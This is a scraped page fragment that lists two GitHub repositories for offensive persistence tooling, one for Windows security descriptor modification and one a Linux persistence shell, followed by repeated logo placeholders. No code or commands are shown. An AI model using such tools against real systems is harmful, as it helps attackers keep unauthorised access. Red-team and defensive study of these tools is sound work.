GitHub - HarmJ0y/DAMP: The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor ModificationGitHub
GitHub - MatheuZSecurity/D3m0n1z3dShell: Demonized Shell is an Advanced Tool for persistence in linux.GitHub
Logo
Logo
Logo
Logo
Logo
Logo
Logo
Logo
Logo
Logo
Logo
Logo
Logo